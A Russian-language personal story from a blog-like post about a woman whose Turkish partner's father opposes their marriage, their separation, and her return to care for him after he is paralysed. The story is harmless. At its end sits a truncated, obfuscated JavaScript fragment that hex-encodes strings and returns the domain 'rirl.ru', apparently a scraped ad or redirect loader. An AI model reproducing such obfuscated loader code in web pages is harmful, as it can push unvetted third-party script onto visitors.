Пост!

Ни за что не откажусь. Часть 2

Не буду описывать все козни и подробности, которые устраивал его отец, опишу только основной случай.
Каждое лето отец уезжал в их загородной дом в Кемере на месяц. Они там не живут лишь изредка приезжают на отдых, так же все члены семьи и друзья могут там отдыхать. Это огромная вилла. У отца там собственная конюшня. Вокруг виллы очень красивый ботанический сад, там живут павлины, попугаи, ящерицы, есть свое поле для гольфа. И в этот раз он решил предложить нам приехать погостить тоже.
Мы приехали, там была родная сестра отца, ветеринар из Италиии с женой и очень красивая утонченная молодая девушка, как оказалось, это дочка отцовского друга. Мало того, что отец уделил ей место за столом возле моего Х, так он еще попросил моего любимого показать ей новую лошадь, которую ему подарили с Арабских Эмиратов. Но я не растерялась и сказала, что тоже не против пойти с ними на что он ответил, что хотел бы со мной пообщается. Я даже не могу передать словами, как мне было обидно. Думаю он заметил, на тот момент мои эмоции, потому что я не когда не умела их скрывать.
Мой отдых был полностью испорчен, так как девушка вилась как змея возле моего Х, а я только злилась внутри себя и считала дни, когда мы от туда уедем. Далее, она все чаще стала с нами встречается. Я начала ревновать. У нас пошли ссоры из- за этого. И как то в один день я не выдержала и спросила его
- Ты со мной просто развлекаешься,а женишься на такой как Эстра? Он ничего не ответил а просто молча взял свою куртку и ушел. Утром, когда я проснулась его рядом не было. Это была первая ночь, когда я ночевала одна. Потом таких ночей становилось все больше и больше. Он мог спокойно не приезжать домой, был каким то замкнутым и молчаливым. Все мои попытки выяснить, что с ним происходит не были успешными. И тогда я приняла решение уехать обратно в Россию.
Пока мы ехали в Аэропорт он не произнес ни слова. Я видела печаль в его глазах, видела, что и ему тоже очень тяжело, но не знала что сказать. Я только ждала, что он расскажет мне, что происходит, почему его отношение ко мне так изменилось. Не ужели он больше меня не любит? И я была для него всего лишь временным развлечением, которое ему наскучило за три года и он потерял ко мне интерес, но почему тогда он такой печальный?
Одни вопросы крутились в моей голове и не одного ответа.
В Аэропорту он подвел меня к регистрационному столу, подождал пока я пройду регистрацию и молча дал мне свернутый пакет.
- Возьми пожалуйста, тебе это очень пригодится. И прости меня, если сможешь.
Поцеловал в щеку и ушел, я смотрела ему в след, но он шел быстро и даже не оглянулся.
Я стояла как вкопанная, все мое тело как будто окаменело и я не могла даже двигаться.
Не ужели мы расстались? Слезы хлынули из глаз. Мне было так больно, словно мне воткнули нож в сердце и я не могла дышать.
В пакете были деньги. Думаю дальше вы догадались, что я почувствовала в этот момент.
Дома. Я целый меся не могла ни есть, ни спать, не хотела никого видеть и ни с кем разговаривать. Я только лежала в кровати и плакала, плакала..Я ему не писала, только ждала от него весточки, но её так и не было.
И только спустя два месяца он мне позвонил в час ночи. Он был очень пьян.
- Привет. Я должен все объяснить. Помнишь, ты спросила меня как то на счет женитьбы. Так вот, на следующий день я был у отца и сказал, что хочу женится на тебе. Но отец начал кричать, что он против этого союза, что не позволит, чтоб его сын женился на русской.
У нас начался спор и он мне заявил, что я могу сделать то что я хочу против его воли, но тогда он лишит меня наследства и я уйду ни с чем и могу забыть навсегда дорогу домой. У нас у мусульман ни как у вас, мы не можем пойти против воли своего отца и матери.
Я надеюсь ты меня поймешь и простишь.
Он сказал, что думает обо мне каждую минуту и ему сейчас очень тяжело. Он пытался меня забыть, остыть ко мне, но вместо этого ему становилось только еще хуже. И мы договорились, что он прилетит ко мне в Россию и мы пока что будем встречается как раньше.
Но в Россию он так и не прилетел. Больше я его не слышала и не видела. В соц сетях он не появлялся. Телефон его был заблокирован.
Прошло два года. Это время немного подлечило мою раненную душу, мне уже не было так тяжело, но я не переставала думать о нем иногда заходила на его страницу и по тысячному кругу перелистывала фотографии. И меня насторожили комментарии друзей на его странице; “Дорогой друг, добро пожаловать домой, желаю тебе быстрого выздоровления» много посланий такого рода. Я решила написать его другу и спросить, что случилось. Друг ответил мне, что два года назадX когда нырял в море наткнулся на камень и сломал себе шею, и его парализовало. Его лечили сначала в Стамбуле, потом в Германии а сейчас перевели обратно домой и дальше он будет лежать дома.
Когда я зашла в комнату, он лежал на белых простынях. Комната была оборудована как больничная палата, множество каких то аппаратов, запах лекарств. Белые стены. Я подошла поближе к его кровати, он спал. Я долго всматривалась в его лицо, передо мной был совершенно другой человек. Худое лицо, впалые глаза, его прекрасные густые черные волосы покрылись сединой. За два года болезнь измучила его и изменила его тело до неузнаваемости. Я не смогла сдержать слез. Молча села рядом с ним, взяла за руку, она была такой худой, бледной и безжизненной и только прижав его руку к своему сердцу я почувствовала родную душу, которую так сильно любила. Он проснулся, увидев меня его глаза наполнились слезами и засверкали искорками радости.
Сейчас, я рядом со своим любимым. Его отец попросил у меня прощения за то, что с самого начала не дал согласия на наш брак.
Теперь нам предстоит длительное и очень сложное лечение, но благодаря совместным ежедневным упорным стараниям мы идем на поправку. И я свято верю, что Всевышний смилуется над нами и мой любимый снова сможет жить как раньше полноценной жизнью.
Я очень сильно его люблю. С того самого первого дня знакомства прошло семь лет, но наши чувства друг к другу с каждым годом становились только сильнее. И как бы мне тяжело в жизни не было, я всегда буду рядом с ним и буду любить его каким бы он не был. Ведь только рядом с ним я чувствую, что живу! И от него- Я НИ ЗА ЧТО НЕ ОТКАЖУСЬ!
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "rirl.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e



Если Вам понравилось, поделитесь с друзьями в соцсетях:

Пост!














Теги: только, меня, очень, когда, рядом